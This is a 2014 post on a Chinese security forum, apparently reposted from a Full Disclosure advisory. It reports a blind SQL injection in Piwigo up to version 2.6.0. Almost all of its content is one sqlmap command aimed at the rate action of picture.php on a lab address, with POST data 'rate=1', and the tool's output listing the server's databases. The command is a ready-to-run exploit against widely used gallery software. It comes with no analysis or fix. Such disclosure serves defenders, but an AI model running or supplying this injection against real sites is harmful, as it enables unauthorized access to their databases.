搜索
查看: 365|回复: 0

Piwigo <= v2.6.0 - Blind SQL Injection

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-11-14 21:10:04 | 显示全部楼层 |阅读模式
from:http://seclists.org/fulldisclosure/2014/Nov/23

  1. python sqlmap.py -u "
  2. http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data
  3. "rate=1" --dbs

  4. [16:32:25] [INFO] the back-end DBMS is MySQL
  5. web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
  6. web application technology: PHP 5.3.2, Apache 2.2.14
  7. back-end DBMS: MySQL 5
  8. [16:32:25] [INFO] fetching database names
  9. [16:32:25] [INFO] fetching number of databases
  10. [16:32:25] [INFO] resumed: 4
  11. [16:32:25] [INFO] resumed: information_schema
  12. [16:32:25] [INFO] resumed: mysql
  13. [16:32:25] [INFO] resumed: phpmyadmin
  14. [16:32:25] [INFO] resumed: piwigo
  15. available databases [4]:
  16. [*] information_schema
  17. [*] mysql
  18. [*] phpmyadmin
  19. [*] piwigo
复制代码
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表